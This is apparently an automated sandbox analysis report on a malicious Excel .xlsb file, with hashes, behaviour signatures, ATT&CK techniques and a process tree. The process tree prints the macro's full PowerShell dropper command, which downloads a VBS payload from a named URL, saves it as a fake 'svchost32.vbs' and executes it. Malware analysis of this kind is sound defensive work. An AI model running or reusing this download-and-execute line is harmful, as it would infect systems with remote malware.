Analysis

  • max time kernel
    162s
  • max time network
    182s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-11-2022 15:56

General

  • Target

    52b575d356d01ed7ee3bac6f661a15445b25114ede3b17abd84c5f23ffdd7f7e.xlsb

  • Size

    18KB

  • MD5

    bf38346431c758df4bd99e3d4b5fcab1

  • SHA1

    08f72bdd853bd37bcfc697e58ea78faad64007a1

  • SHA256

    52b575d356d01ed7ee3bac6f661a15445b25114ede3b17abd84c5f23ffdd7f7e

  • SHA512

    e8ac260a57fa01d7c45d42997a567fe3951151cd35b0d3da79163d9e324f4bf34f071e2db01c61ceb03a10de2953f1bd6167556d99c6e88edce1423d9acfc38e

  • SSDEEP

    384:4FhW90ydPUDyn1MtzIVc/bmNLAwQghdkHTCFqnM2i7NPwG8:MQ1U6cszQEdN8nM2ipPQ

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://fast-cargo.com/images/file/vb/Upload.vbs

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\52b575d356d01ed7ee3bac6f661a15445b25114ede3b17abd84c5f23ffdd7f7e.xlsb"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4568
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" (New-Object System.Net.WebClient).DownloadFile('http://fast-cargo.com/images/file/vb/Upload.vbs','C:\Users\Public\svchost32.vbs');Start-Process 'C:\Users\Public\svchost32.vbs'
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4108

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4108-139-0x0000000000000000-mapping.dmp
  • memory/4108-142-0x00007FFB4A3D0000-0x00007FFB4AE91000-memory.dmp
    Filesize

    10.8MB

  • memory/4108-141-0x00007FFB4A3D0000-0x00007FFB4AE91000-memory.dmp
    Filesize

    10.8MB

  • memory/4108-140-0x0000014A35AB0000-0x0000014A35AD2000-memory.dmp
    Filesize

    136KB

  • memory/4568-135-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-137-0x00007FFB30520000-0x00007FFB30530000-memory.dmp
    Filesize

    64KB

  • memory/4568-138-0x00007FFB30520000-0x00007FFB30530000-memory.dmp
    Filesize

    64KB

  • memory/4568-136-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-132-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-134-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-133-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-144-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-145-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-146-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB

  • memory/4568-147-0x00007FFB32DD0000-0x00007FFB32DE0000-memory.dmp
    Filesize

    64KB